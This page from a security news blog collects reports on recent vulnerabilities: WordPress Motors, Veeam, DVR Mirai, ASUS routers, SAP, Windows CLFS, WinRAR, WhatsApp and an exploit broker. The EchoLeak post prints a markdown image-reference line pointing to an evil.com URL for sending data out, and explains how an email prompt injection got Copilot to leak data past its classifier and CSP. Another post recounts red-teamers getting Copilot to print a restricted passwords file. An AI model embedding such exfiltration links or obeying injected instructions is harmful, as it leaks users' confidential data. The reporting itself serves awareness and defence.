Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Showing posts with label Vulnerabilities and Exploits. Show all posts

Thousands of WordPress Sites at Risk as Motors Theme Flaw Enables Admin Account Takeovers

 

A critical security flaw tracked as CVE-2025-4322 has left a widely used premium WordPress theme exposed to attackers.

Cybercriminals have been exploiting this vulnerability in the Motors theme to seize administrator accounts, allowing them to fully compromise websites—modifying information, inserting fake content, and distributing malicious payloads.

Developed by StylemixThemes, Motors has become especially popular with automotive websites, recording nearly 22,500 purchases on EnvatoMarket. Security researchers first identified the flaw on May 2, 2025, and a fix was issued with version 5.6.68 on May 14. Users who have updated to this version are protected, while those still running versions up to 5.6.67 remain vulnerable.

“This is due to the theme not properly validating a user’s identity prior to updating their password,” Wordfence explained.

“This makes it possible for unauthenticated attackers to change arbitrary user passwords, including those of administrators, and leverage that to gain access to their account.”

Despite the release of the patch, attacks began surfacing as early as May 20. By June 7, researchers observed widespread exploitation, with Wordfence reporting it had already blocked over 23,000 attack attempts. The firm also shared lists of IP addresses involved in the attacks, many launching thousands of intrusion efforts.

“One obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability,” the researchers explained.

To secure their sites, users of the Motors theme are strongly advised to upgrade to version 5.6.68 immediately, which addresses the flaw and prevents further account takeovers.

Researchers Advise Caution as Veeam Releases Patch to Fix Critical Vulnerability

 

Following Veeam Backup & Replication's Tuesday patch release to patch a critical remote code execution vulnerability, researchers are advising customers to ensure their systems are completely upgraded to the latest version

An authorised domain user can execute code on a backup server thanks to the vulnerability, which is tagged as CVE-2025-23121. It was previously revealed by watchTowr and Code White GmbH researchers that a fix for an earlier vulnerability, identified as CVE-2025-23120, could be circumvented. As a result of the disclosure, a new patch was prepared. 

Benjamin Harris, CEO of watchTowr, claims that Veeam is essentially updating a blacklist of "dangerous deserialisation gadgets" once they have been identified. Harris said that throughout the deployment of multiple patches for the Backup & Replication product, researchers have observed this occur repeatedly.

"This blacklisting approach will never be sufficient, as we advocated in March," Harris wrote in an email to Cybersecurity Dive, further stating that his team "demonstrated [this] once again in March when we reported further gadgets to Veeam that they have released patches for [on Tuesday] to address.” 

Veeam stated that the patch fixes the issue, and automatic updates have been enabled for all backup versions.

“When a vulnerability is identified and disclosed, attackers will still try to exploit and reverse-engineer the patches to use the vulnerability on an unpatched version of Veeam software in their exploitation attempts,” a Veeam spokesperson told Cybersecurity Dive via email. “This underlines the importance of ensuring customers are using the latest versions of all software and patches are installed in a timely manner.”

In the case of a ransomware attack or other malicious infiltration, Veeam Backup & Replication is a solution that assists in backing up, replicating, and restoring enterprise data. Domain-joined backup servers, which Veeam has previously recommended against deploying, are at risk of being abused. However, it seems that the risky method is frequently employed for efficiency.

Harris noted that Veeam employs a function to handle data that is known to be intrinsically insecure, and that rather than eliminating this function, they will try to maintain a list of bad "gadgets" that should not be processed within this function. 

Veeam has around 550,000 customers, and ransomware gangs often exploit the product's flaws. Rapid7 researchers revealed on Tuesday that more than 20% of the firm's incident response cases in 2024 involved Veeam being accessed or abused.

Veeam Issues Urgent Security Patch to Fix Critical RCE Flaw in Backup & Replication Software


Veeam has rolled out crucial security patches addressing multiple vulnerabilities in its Backup & Replication (VBR) software—most notably, a critical remote code execution (RCE) flaw tracked as CVE-2025-23121.

This specific vulnerability, discovered by researchers at watchTowr and CodeWhite, impacts only those VBR installations that are joined to a domain. According to Veeam’s security advisory released on Tuesday, the flaw allows authenticated domain users to execute code remotely on the backup server through relatively simple attack methods. The issue affects Veeam Backup & Replication version 12 and later and has been resolved in version 12.3.2.3617, which was made available earlier today.

Despite the restriction to domain-linked systems, the vulnerability can be exploited by any domain user—posing a serious risk in environments where this configuration exists.

Many organizations still connect their backup servers to Windows domains, contrary to Veeam's best practices. The company advises using a separate Active Directory Forest and enforcing two-factor authentication for administrative accounts.

This is not the first time Veeam has faced such issues. In March, the company addressed another RCE vulnerability (CVE-2025-23120), also targeting domain-connected installations.

Ransomware operators have long focused on VBR servers due to their strategic value. These systems often serve as the gateway to deleting backups and crippling restoration efforts, as BleepingComputer was told by threat actors in prior years.

Recent incidents further highlight the ongoing risk. Sophos X-Ops disclosed in November that CVE-2024-40711, revealed in September, is actively being used to deploy Frag ransomware. This flaw was also weaponized in Akira and Fog ransomware campaigns starting October.

Historically, groups like the Cuba ransomware gang and FIN7—a financially motivated threat group with ties to Conti, REvil, Maze, and BlackBasta—have exploited similar VBR vulnerabilities.

Veeam's software is widely used across industries, serving over 550,000 customers globally, including 82% of Fortune 500 and 74% of Global 2,000 companies.

Aim Security Reveals Zero-Click Flaw in AI Powered Microsoft Copilot

 


It has recently been reported that a breakthrough cyber threat known as EchoLeak has been documented as the first documented zero-click vulnerability that specifically targets Microsoft 365 Copilot in the enterprise. This raises important concerns regarding the evolving risks associated with AI-based enterprise tools.

In a recent report, cybersecurity firm AIM Security has discovered a vulnerability that allows threat actors to stealthily exfiltrate sensitive information from Microsoft's intelligent assistant without any user interaction, marking a significant improvement in the sophistication of attacks that are based on artificial intelligence. 

This vulnerability, known as CVE-2025-32711, which carries a critical CVSS score of 9.3, represents an extremely serious form of injection of commands into the artificial intelligence system. Copilot's responses can be manipulated by an unauthorised actor, and data disclosure over a network can be forced by indirect prompt injection even when the user has not engaged or clicked on any of the prompts. 

As part of the June 2025 Patch Tuesday update, Microsoft confirmed that this issue exists and included the fix in the patch. In the update, Microsoft addressed 68 vulnerabilities in total. An EchoLeak is a behaviour described as a "scope Violation" in large language models (LLMs). This is the result of the AI’s response logic being bypassed by contextual boundaries that were meant to limit the AI’s behaviour. As a result, unintended behaviours could be displayed and confidential information could be leaked. 

In spite of the fact that no active exploitation of the flaw has been detected, Microsoft has stated that there is no need for the customer to take any action at this time, since this issue has already been resolved. In light of this incident, it becomes increasingly apparent that the threat of securing AI-powered productivity tools is growing and that organisations must put in more robust measures to protect data from theft and exploitation. 

It is believed that the EchoLeak vulnerability exploits a critical design flaw in Microsoft 365 Copilot's interaction with trusted internal data sources, including emails, Teams conversations, and OneDrive files, as well as untrustworthy external inputs, especially inbound emails, that can be exploited in a malicious manner. 

As a result of the attack, the threat actor sends an email that contains the following markdown syntax:

![Image alt text][ref] [ref]: https://www.evil.com?param= 

The code seems harmless, but it exploits Copilot's background scanning behaviour in a way that appears harmless. When Copilot processes an email without any user action, it is inadvertently executing a browser request to transmit information to an external server controlled by an attacker, including user details, chat history, and confidential internal documents. 

Considering this kind of exfiltration requires no user input, it's particularly stealthy and dangerous. It relies on a triple underlying vulnerability chain to carry out the exploit chain, one of the most critical of which is a redirect loophole within Microsoft's Content Security Policy (CSP). As a result of the CSP's inherent trust in domains such as Microsoft Teams and SharePoint, attackers have been able to disguise malicious payloads as legitimate traffic, enabling them to evade detection. 

By presenting the exploit in a clever disguise, it is possible to bypass the existing defences that have been built to protect against Cross-Prompt Injection Attacks (XPIA)—a type of attack that hijacks AI prompts across contexts—to bypass existing defences. EchoLeak is considered to be an example of an LLM Scope Violation, a situation in which large language models (LLMs) are tricked into accessing and exposing information that goes outside of their authorised scope, which constitutes an LLM Scope Violation. 

It is reported that the researchers at the company are able to use various segments of the AI's context window as references to gather information that the AI should not reveal. In this case, Copilot can synthesize responses from a variety of sources, but becomes a vector for data exfiltration because the very feature that enables Copilot to do so becomes a vector for data exfiltration. 

According to Michael Garg, Co-Founder and CTO of Aim Security, a phased deployment of artificial intelligence does not guarantee safety. In his opinion, EchoLeak highlights a serious concern with the assumptions surrounding artificial intelligence security, particularly in systems that combine trusted and untrusted sources without establishing strict boundaries. 

Interestingly, researchers have also found similar vulnerabilities in other LLM-based systems, suggesting that the issue may go beyond Microsoft 365 Copilot as well. It is now understood that the flaw has been fixed by Microsoft and that no malicious exploitation has been reported in the wild, and no customer information has been compromised as a result. 

However, the discovery of EchoLeak serves to remind us of the unique risks that AI-powered platforms pose and that proactive security validation in AI deployments is an imperative step. In EchoLeak, a complex yet very simple exploit is exploited, which exploits the seamless integration between large language models (LLMs) and enterprise productivity tools by leveraging the deception-like simplicity of the attack chain and utilising it to its fullest extent. In the beginning, the attack begins with a malicious email designed to appear as a routine business communication.

It does not contain any obvious indicators that would raise suspicions. This message is disguised as a benign one, but it has been crafted into a stealthy prompt injection, a clever piece of text that is intended to manipulate the AI without being detected. The reason this injection is so dangerous is the natural language phrasing it uses, which enables it to bypass Microsoft's Cross-Prompt Injection Attack (XPIA) classifier protections in order to evade detection. 

The message is constructed in such a way that it appears contextually relevant to the end user, so existing filters do not flag the message. Then, whenever a user interacts with Copilot and poses a related business query, the Retrieval-Augmented Generation (RAG) engine from Microsoft retrieves that previously received email and interprets it as relevant to the user's request within the LLM's context input. 

The malicious injection, once it is included in the prompt context, disappears from sight and undercoverly instructs the LLM to extract internal data, such as confidential memos or user-specific identifiers, and embed these sensitive details as a URL or image reference on the site. As a result of exploiting certain markdown image formats during testing, the browser was prompted to fetch the image without prompting the user, which then sent the entire URL, including the embedded sensitive data, to the attacker’s server, without the user being aware of the situation. 

Among the key components that enable the exploit is Microsoft Copilot’s Content Security Policy (CSP), which, despite being designed to block external domains, trusts Microsoft-owned platforms such as Teams and SharePoint despite blocking most external domains. By cleverly concealing their exfiltration vectors, attackers have the ability to avoid CSP protections by making outbound requests appear legitimate, bypassing CSPs and ensuring the outbound request appears legitimate. 

While Microsoft has since patched the vulnerability, the EchoLeak incident points to a broader and more alarming trend: as LLMs become increasingly integrated into business environments, traditional security frameworks are becoming increasingly unable to detect and defend against contextual and zero-click artificial intelligence attacks. It has been found that the increasing complexity and autonomy of artificial intelligence systems have already created a whole new class of vulnerabilities which could be concealed and weaponised to obtain high-impact intrusions through stealth. 

It has become increasingly common for security experts to emphasise the need for enhanced prompt injection defences against such emerging threats, including enhanced input scoping, the use of postprocessing filters to block AI-generated outputs containing structured data or external links, as well as smarter configurations in RAG engines that prevent the retrieval of untrusted data. It is essential to implement these mitigations in AI-powered workflows in order to prevent future incidents of data leakage via LLMs, as well as build resilience within these workflows. 

Research from AIM Security has shown that the EchoLeak exploit is very severe and exploits Microsoft's trusted domains, such as SharePoint and Teams, that have been approved by Copilot's Content Security Policy (CSP) for security purposes. It is possible to embed images and hyperlinks into Microsoft 365 Copilot seamlessly by using these whitelisted domains, which allow external content, such as images, to be seamlessly rendered within the application. 

When Copilot processes such content, even in the background, it can initiate outbound HTTP requests, sending sensitive contextual data to servers owned by attackers without being aware of it. The insidious nature of this attack is that it involves no interaction from the user at all, and it is extremely difficult to detect. Essentially, the entire exploit chain is executed in silence in the background, triggered by Copilot's automated scanning and processing of incoming email content, which can include maliciously formatted documents. 

To use this exploit, the user doesn't need to open the message or click on any links. Instead, the AI assistant automatically launches the data exfiltration process with its internal mechanisms, earning the exploit the classification of a "zero-click" attack. This exploit has been validated by Aim Security through the development and publication of a proof-of-concept, which demonstrates how deeply embedded and confidential information, such as internal communications and corporate strategy documents, could be exploited without causing any visible signs or warnings to the end user or to system administrators, without anyone being aware of it at all. 

There is a significant challenge in detecting threats and investigating forensic events due to the stealthy nature of the vulnerability. Microsoft has addressed he vulnerability and has taken swift measures to address it, reminding users that no active exploitation has been observed so far, and no customer data has been compromised as of yet. 

Although the broader implications of the current situation remain unsettling, the very architecture that enables AI systems such as Copilot to synthesise data, engage with users, and provide assistance will also become a potential attack surface - one that is both silent and highly effective in its capabilities. Despite the fact that this particular instance may not have been exploited in the wild, cybersecurity professionals warn that the method itself signals a paradigm shift in the vulnerability landscape when it comes to AI-related services. 

With the increasing use of artificial intelligence services such as Microsoft 365 Copilot, the threat landscape has expanded considerably, but it also highlights the importance of context-aware security models as well as AI-specific threat monitoring frameworks in light of the increasing integration of large language models into enterprise workflows.

Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw

 

A command injection flaw in internet-connected digital video recorders used for CCTV monitoring is the target of a Mirai botnet malware variant, which allows hackers to take over the devices and add them to a botnet. 

Cybersecurity researchers at Russian cybersecurity firm Kaspersky discovered a CVE-2024-3721 exploit while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability found in internet-connected digital video recorders used for CCTV surveillance. Further analysis revealed that the activity was related to a form of the Mirai botnet, which exploited this issue in TBK-manufactured DVR devices to compromise and control them. 

The vulnerability was initially discovered by security researcher "netsecfish" in April 2024. By adjusting parameters like mdb and mdc, the researcher released a proof-of-concept showing how a carefully designed post request to a specific URL can trigger shell command execution. Kaspersky confirmed that this precise technique is being utilised in the wild, with its Linux honeypots catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs. 

Nearly a decade ago, an anonymous source made the Mirai source code available online. It continues to act as the foundation for other evolving botnet efforts. The variant aimed at DVR systems expands on Mirai's initial foundation with extra features such as RC4-based string obfuscation, checks to avoid virtual machine environments, and anti-emulation methods. 

The exploit is used by the attackers to transmit a malicious ARM32 program to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, forward malicious traffic, and engage in other malicious actions.

This Mirai variation uses a basic RC4 technique to decode its internal strings, with the decryption key disguised using XOR. After decryption, the strings are saved in a global list and used throughout runtime. To evade analysis, the virus runs anti-virtualization and anti-emulation checks on active processes for indicators of environments such as VMware or QEMU.

Last year, Netsecfish reported that around 114,000 DVR devices were vulnerable to CVE-2024-3721. Kaspersky estimates the figure to be closer to 50,000. The majority of infections associated with this Mirai variation are found in Brazil, Russia, Egypt, China, India, and Ukraine.

Thousands of ASUS Routers Affected by Stealthy Persistent Backdoor

 

It seems like someone, possibly nation-state hackers, is building a botnet out of thousands of Asus routers that can withstand firmware patches and reboots. Researchers report that about 9,000 routers have been infiltrated, and the figure is still rising. 

GreyNoise, a security firm, warned on Tuesday that attackers utilise a combination of known and previously undisclosed vulnerabilities to attack routers, including a command injection vulnerability identified as CVE-2023-39780. The tradecraft involved implies "a well-resourced and highly capable adversary," maybe building an operable relay box. 

ORBs are a strategy used by advanced persistent threat groups, including intelligence agencies around the world, to conceal malicious behaviour by routing internet traffic through a network of compromised Internet of Things devices. One cybersecurity firm characterises them as the offspring of a VPN and a botnet.

GreyNoise discovered the effort on March 18 and named the technique employed to backdoor the routers "AyySSHush." The intrusion chain starts with brute-force login attempts and two authentication bypass methods with no corresponding CVEs. After gaining access, attackers use CVE-2023-39780 to activate a security mechanism included into Asus routers by TrendMicro. 

The functionality enables "Bandwidth SQLlite Logging," which lets perpetrators feed a string directly into a system() call. With that power, attackers can enable a secure shell and connect it to a TCP port, along with an attacker-controlled public key. That is the step that renders firmware updates ineffective against the hack. 

"Because this key was introduced using official ASUS features, the configuration change is retained across firmware upgrades. "If you've been exploited before, upgrading your firmware will NOT remove the SSH backdoor," Remacle warned. As of publication, Censys' search had identified 8,645 infected routers. 

ASUS addressed CVE-2023-39780 in recent firmware upgrades. However, machines compromised prior to patching may still contain the backdoor unless administrators verify SSH setups and remove the attacker's key from them. For potential compromises, GreyNoise recommends performing a full factory reset.

Ransomware Hackers Target SAP Servers Through Critical Flaw

 


A newly discovered security hole in SAP’s NetWeaver platform is now being misused by cybercriminals, including ransomware gangs. This flaw allows attackers to run harmful commands on vulnerable systems from a distance—without even needing to log in.

SAP issued urgent software updates on April 24 after learning about the flaw, found in NetWeaver’s Visual Composer tool. The weakness, labeled CVE-2025-31324, makes it possible for attackers to upload files containing malware. Once inside, they can take full control of the affected system.

ReliaQuest, a cybersecurity firm that tracked this issue, now says that two known ransomware groups, RansomEXX and BianLian have joined in. Although they haven’t yet successfully launched any ransomware in these cases, their involvement shows that multiple criminal groups are watching this flaw closely.

Investigators linked BianLian to at least one incident using an IP address tied to their past operations. In another case, RansomEXX attackers used a backdoor tool called PipeMagic and also took advantage of a previously known bug in Microsoft’s Windows system (CVE-2025-29824).

Even though their first effort didn’t succeed, the attackers made another attempt using a powerful hacking framework called Brute Ratel. They delivered it using a built-in Microsoft function called MSBuild, which helped them run the attack in a sneaky way.

More recently, security teams from Forescout and EclecticIQ connected this activity to hackers linked to China. These groups, tracked under various names, were also found to be exploiting the same SAP vulnerability. In fact, they managed to secretly install backdoors on at least 581 SAP systems, including some tied to national infrastructure in the US, UK, and Saudi Arabia. Their plans may also include targeting nearly 2,000 more systems soon.

Experts believe these hidden access points could help foreign state-sponsored hackers gather intelligence, interfere with operations, or even achieve military or economic goals. Since SAP systems are often connected to important internal networks, the damage could spread quickly within affected organizations.

SAP has also fixed another weakness (CVE-2025-42999), which had been silently misused since March. To stay safe, system administrators are advised to apply the patches immediately. If they can’t update right away, disabling the Visual Composer tool can help. They should also restrict access to certain features and monitor their systems closely for anything unusual.

The US government’s cyber agency CISA has officially listed this flaw as a known risk. Federal departments were told to patch their systems by May 20 to avoid falling victim.

Pen Test Partners Uncovers Major Vulnerability in Microsoft Copilot AI for SharePoint

 

Pen Test Partners, a renowned cybersecurity and penetration testing firm, recently exposed a critical vulnerability in Microsoft’s Copilot AI for SharePoint. Known for simulating real-world hacking scenarios, the company’s redteam specialists investigate how systems can be breached just like skilled threatactors would attempt in real-time. With attackers increasingly leveraging AI, ethical hackers are now adopting similar methods—and the outcomes are raising eyebrows.

In a recent test, the Pen Test Partners team explored how Microsoft Copilot AI integrated into SharePoint could be manipulated. They encountered a significant issue when a seemingly secure encrypted spreadsheet was exposed—simply by instructing Copilot to retrieve it. Despite SharePoint’s robust access controls preventing file access through conventional means, the AI assistant was able to bypass those protections.

“The agent then successfully printed the contents,” said Jack Barradell-Johns, a red team security consultant at Pen Test Partners, “including the passwords allowing us to access the encrypted spreadsheet.”

This alarming outcome underlines the dual-nature of AI in informationsecurity—it can enhance defenses, but also inadvertently open doors to attackers if not properly governed.

Barradell-Johns further detailed the engagement, explaining how the red team encountered a file labeled passwords.txt, placed near the encrypted spreadsheet. When traditional methods failed due to browser-based restrictions, the hackers used their red team expertise and simply asked the Copilot AI agent to fetch it.

“Notably,” Barradell-Johns added, “in this case, all methods of opening the file in the browser had been restricted.”

Still, those download limitations were sidestepped. The AI agent output the full contents, including sensitive credentials, and allowed the team to easily copy the chat thread, revealing a potential weak point in AI-assisted collaborationtools.

This case serves as a powerful reminder: as AItools become more embedded in enterprise workflows, their securitytesting must evolve in step. It's not just about protecting the front door—it’s about teaching your digital assistant not to hold it open for strangers.

For those interested in the full technical breakdown, the complete Pen Test Partners report dives into the step-by-step methods used and broader securityimplications of Copilot’s current design.

Davey Winder reached out to Microsoft, and a spokesperson said:

“SharePoint information protection principles ensure that content is secured at the storage level through user-specific permissions and that access is audited. This means that if a user does not have permission to access specific content, they will not be able to view it through Copilot or any other agent. Additionally, any access to content through Copilot or an agent is logged and monitored for compliance and security.”

Further, Davey Winder then contacted Ken Munro, founder of Pen Test Partners, who issued the following statement addressing the points made in the one provided by Microsoft.

“Microsoft are technically correct about user permissions, but that’s not what we are exploiting here. They are also correct about logging, but again it comes down to configuration. In many cases, organisations aren’t typically logging the activities that we’re taking advantage of here. Having more granular user permissions would mitigate this, but in many organisations data on SharePoint isn’t as well managed as it could be. That’s exactly what we’re exploiting. These agents are enabled per user, based on licenses, and organisations we have spoken to do not always understand the implications of adding those licenses to their users.”

Windows CLFS Zero-Day Flaw Exploited in Play Ransomware Attacks

 

In zero-day attacks, the Play ransomware gang exploited a critical Windows Common Log File System flaw to gain SYSTEM access and install malware on infected PCs. The vulnerability, known as CVE-2025-29824, was identified by Microsoft as being exploited in a small number of attacks and addressed during last month's patch.

"The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia," Microsoft noted in April. 

Microsoft attributed these assaults to the RansomEXX ransomware outfit, claiming that the perpetrators installed the PipeMagic backdoor malware, which was employed to deliver the CVE-2025-29824 exploit, ransomware payloads, and ransom letters after encrypting files. 

Since then, Symantec's Threat Hunter Team has discovered evidence linking them to the Play ransomware-as-a-service operation, claiming that the hackers used a CVE-2025-29824 zero-day privilege escalation exploit after breaching a US organization's network. 

"Although no ransomware payload was deployed in the intrusion, the attackers deployed the Grixba infostealer, which is a custom tool associated with Balloonfly, the attackers behind the Play ransomware operation," Symantec added. "Balloonfly is a cybercrime group that has been active since at least June 2022 and uses the Play ransomware (also known as PlayCrypt) in attacks.” 

The Grixba custom network-scanning and information-stealing program was discovered two years ago, and Play ransomware operators often use it to list users and computers in compromised networks. The Play cybercrime gang first appeared in June 2022, and it is also renowned for double-extortion attacks, in which its affiliates coerce victims into paying ransoms to prevent their stolen data from being exposed online. 

As of October 2023, the Play ransomware gang has compromised the networks of around 300 organisations globally, according to a joint alert released by the FBI, CISA, and the Australian Cyber Security Centre (ACSC) in December 2023. 

The cloud computing company Rackspace, the massive auto retailer Arnold Clark, the City of Oakland in California, Dallas County, the Belgian city of Antwerp, and, more recently, the American semiconductor supplier Microchip Technology and doughnut chain Krispy Kreme are among the notable victims of the Play ransomware.

Microsoft: CLFS Zero-Day Flaw Exploited in Ransomware Attacks

 

Ransomware attackers abused a zero-day flaw in a widely used Windows logging system for managing transactional information to launch attacks against organisations in the US real estate sector, Microsoft revealed Tuesday. 

In a blog post, the tech giant stated that the perpetrators employed a previously unknown flaw discovered in Windows' Common Log File System - a popular target for malicious actors seeking privilege escalation - to attack "a small number of targets," including American real estate firms, a Spanish software company, Venezuela's financial sector, and Saudi Arabia's retail sector. 

The flaw, identified as CVE-2025-29824, has a CVSS score of 7.8 and has been added to the Cybersecurity and Infrastructure Security Agency's "Known Exploited Vulnerabilities Catalogue". 

Microsoft stated that Storm-2460, a ransomware threat actor, used the issue to spread PipeMagic malware. In March, the firm addressed a different bug in the Windows Win32 Kernel Subsystem that allowed hackers to escalate privileges to the system level, an exploit that researchers later linked to targeted assaults targeting Asian and Saudi organisations using a PipeMagic backdoor.

The tech behemoth said it "highly recommends organizations apply all available security updates for elevation of privilege flaws to add a layer of defense against ransomware attacks if threat actors are able to gain an initial foothold.”

Microsoft noted that it has not yet determined how Storm-2460 got access to compromised devices, although it did note that the organisation downloaded malware from a legitimate third-party website it had previously infiltrated using the Windows certutil application.

Following the deployment of PipeMagic, the attackers used a technique that prevented them from writing data to disc and enabled them to launch the log system exploit directly in memory. In a security update posted on Tuesday, the company stated that users of Windows 11, version 24H2, "are not affected by the observed exploitation, even if the vulnerability was present.”

WinRAR Bug Circumvents Windows Mark of Web Security Notifications.

 

A security flaw in the WinRAR file archiver solution might be used to circumvent the Mark of the Web (MotW) security warning and execute arbitrary code on a Windows computer. The vulnerability is known as CVE-2025-31334 and impacts all WinRAR versions except the most recent release, 7.11. 

Mark of the Web is a security mechanism in Windows that uses a metadata value (an additional data stream called 'zone-identifier') to identify potentially dangerous files downloaded from the internet. When you launch an executable with the MotW tag, Windows informs you that it was obtained from the internet and can be risky, and you can choose whether to continue or terminate it.

Symlink to executable

The CVE-2025-31334 flaw allows an attacker to circumvent the MotW security warning when opening a symbolic link (symlink) to an executable file in any WinRAR version prior to 7.11. Using a specially designed symbolic link, an attacker can execute arbitrary code. It should be noted that on Windows, symlinks can only be generated with administrator privileges. 

The security flaw received a medium severity score of 6.8 and was fixed in the latest version of WinRAR, according to the applications change log: “If symlink pointing at an executable was started from WinRAR shell, the executable Mark of the Web data was ignored” - WinRaR. 

Shimamine Taihei of Mitsui Bussan Secure Directions reported the vulnerability to the Information Technology Promotion Agency (IPA) in Japan. The responsible disclosure was organised by Japan's Computer Security Incident Response Team with the developer of WinRAR.

Starting with version 7.10, WinRAR allows you to remove information from the MotW alternative data stream (such as location and IP address) that could be deemed a privacy issue. Cybercriminals, including state-sponsored ones, have previously used MotW bypasses to transmit malware without triggering the security warning. 

Recently, Russian attackers exploited a vulnerability in the 7-Zip archiver that did not propagate the MotW when double archiving (archiving one file within another) to launch the Smokeloader malware dropper.

WhatsApp for Windows Exposed to Security Risk Through Spoofing Vulnerability

 


Whatsapp for Windows has been recently revealed to have a critical security vulnerability known as CVE-2025-30401. This vulnerability has raised serious concerns within the cybersecurity community since it has been identified. The high severity of this vulnerability affects desktop versions of the application released before 2.2450.6, which could lead to an exploitation attack. An issue resulting from inconsistencies in the handling of file metadata enables threat actors to manipulate these inconsistencies in order to circumvent security checks. 

By exploiting this vulnerability, malicious actors can execute arbitrary code on targeted systems without user awareness, resulting in the possibility of unauthorized access to sensitive information or data compromise. Several security experts have emphasized that in order to mitigate the risks associated with this vulnerability, you must update your WhatsApp version to the latest version. Organizations and users of WhatsApp for Windows are strongly advised to apply the necessary patches immediately so that they are protected from threats. 

In accordance with the official security advisory, there is a critical inconsistency in how WhatsApp's desktop application deals with file attachments. There is a fundamental difference between the way the application determines how to display attachments using its MIME type versus the way the operating system interprets the file extension to determine how it should be opened or executed as a result. This difference in interpretation has created a serious security vulnerability. An attacker can create a malicious file that appears benign but is actually dangerous.

For instance, the attacker might use an MIME type that is typically used for images, along with an executable file extension such as exe, to craft a malicious file. Although the application would visually present it as safe, as per its MIME type, the operating system would handle it based on what its actual extension is. As a result of such a mismatch, users may be misled into opening a file that appears harmless but in reality is executable and thus allowing the execution of arbitrary code unintentionally by the user. As a result of such an attack vector, the likelihood of successful social engineering attacks and system compromises increases significantly. 

There has been a significant amount of research conducted on the issue, and the findings indicate that if a deliberate discrepancy was made between the MIME type and the extension of the file, it could have led the recipient unintentionally to execute arbitrary code by manually accessing the attachment within WhatsApp's desktop application, instead of just viewing its contents. This behavior represented a considerable threat, particularly in scenarios involving the user initiating the interaction. 

Fortunately, an independent security researcher who discovered this vulnerability and disclosed it to Meta through the company's Bug Bounty Program has been credited with responsibly disclosing it to the company, but the company does not appear to have confirmed whether the vulnerability has been actively exploited in the real world. It is important to note that such a security issue has not occurred on the platform in the past. 

In July 2024, WhatsApp was able to resolve a related security issue, which allowed Python and PHP attachments to be run automatically by Windows systems with the corresponding interpreters installed—without prompting the user. In the same vein, an incident similar to that of the platform highlighted the risks associated with the handling and execution of files incorrectly. In the end, these cases emphasize the importance of rigorous input validation and consistent file interpretation across all applications and operating systems, regardless of the type of application.

Due to its vast user base and widespread adoption, WhatsApp remains a highly valuable target for cyber threat actors, whether they are motivated by financial gain or geopolitical interests. The platform has become a recurring target of malicious campaigns because of its deep integration into users' personal and professional lives, coupled with the trust it commands. There have been several incidents in which attackers have exploited security vulnerabilities within WhatsApp to gain access to users' data, exfiltrate sensitive data, and install sophisticated malware as a result. 

A zero-day vulnerability that affects WhatsApp is particularly lucrative in underground markets, sometimes commanding a price of over one million dollars. Not only does the WhatsApp user base have a large footprint, but attackers can also gain an advantage by unknowingly accessing private conversations, media files, and even device-level abilities to gain a strategic advantage. Graphite, a form of spyware developed by Paragon, had been exploited by active hackers in March 2025 as a zero-click, zero-day vulnerability which WhatsApp remedied in March 2025. 

Using this exploit, the targeted individuals could be monitored remotely, without the victim having to interact with the attacker - an example of an advanced persistent threat campaign. An investigation by a research group based at the University of Toronto uncovered this surveillance campaign, which targeted journalists and members of civil society. The Citizen Lab was conducting the investigation, which was the source of the information. 

Following their report, WhatsApp swiftly acted to neutralize the campaign. Meta confirmed that the vulnerability had been silently patched in December 2024 without a client-side update being required. Despite being resolved without a formal CVE identifier being assigned, the issue is still of great importance to the global community. In order to protect platforms of such importance from exploitation, proactive vulnerability management, continuous security auditing, and cross-sector cooperation must be adopted. 

In the wake of the successful implementation of server-side mitigations, WhatsApp sent out security notifications on January 31 to roughly 90 Android users across over two dozen countries that had been affected by the vulnerability. Journalists and human rights activists in Italy were among the individuals alerted. They were identified as the targets of an elaborate surveillance operation using Paragon Graphite spyware, which utilized the zero-click exploit of a computer system. 

An Israeli cybersecurity firm known as NSO Group has been accused of violating American anti-hacking statutes by distributing its Pegasus spyware utilizing WhatsApp zero-day vulnerabilities in December of 2016, following a pattern of highly targeted cyber intrusions utilizing advanced surveillance tools. This incident follows a broader pattern of highly targeted cyber intrusions. Several evidences were provided to the court which indicated that at least 1,400 mobile devices had been compromised as a result of these covert attacks.

According to court documents, NSO Group carried out zero-click surveillance operations by deploying multiple zero-day exploits to compromise WhatsApp's systems. As part of the spyware delivery process, malicious messages were sent that did not require the recipient to interact with them at all, exploiting vulnerabilities within the messaging platform. Aside from that, the documents also allege that NSO developers reverse engineered WhatsApp's source code to create custom tools that could deliver these payloads, conduct that was deemed to have been illegal under state and federal cybersecurity laws. 

Those cases emphasize the increasing sophistication of commercial surveillance vendors as well as the necessity for robust legal and technical defenses to protect digital communication platforms, as well as the individuals who rely upon them, from abuse. As a result of these incidents, user must remain vigilant, maintain timely security updates, and strengthen the security measures within widely used communication platforms to reduce the risk of cyber-attacks. 

There has been an increasing prevalence of threat actors using sophisticated techniques to exploit even small inconsistencies, which is why it is essential to maintain a proactive and collaborative approach to cybersecurity. To maintain a secure digital environment, platform providers and end users both need to be aware of and responsible for their role as well.

Operation Zero Offers Up to $4M for Telegram Exploits

 

Operation Zero, a firm specializing in acquiring and selling zero-day vulnerabilities exclusively to Russian government entities and local companies, has announced a significant bounty for exploits targeting Telegram. The company is willing to pay up to $4 million for a full-chain exploit that could compromise the popular messaging app.

The exploit broker has set tiered rewards for different vulnerabilities:
  • Up to $500,000 for a one-click remote code execution (RCE) exploit.
  • Up to $1.5 million for a zero-click RCE exploit.
  • Up to $4 million for a full-chain exploit, potentially allowing hackers to gain full access to a target’s device.
Operation Zero’s focus on Telegram is strategic, given its widespread use in Russia and Ukraine. The company's offer provides insight into the Russian zero-day market, which remains largely secretive.

Exploit brokers often publicize bounties for vulnerabilities when they detect high demand. This suggests that the Russian government may have specifically requested Telegram exploits, prompting Operation Zero to advertise these high-value offers.

Zero-day vulnerabilities are particularly valuable because they remain unknown to software makers, making them highly effective for cyber operations. Among them, zero-click RCE exploits are the most sought after, as they require no user interaction—unlike phishing-based attacks—making them stealthier and more powerful.

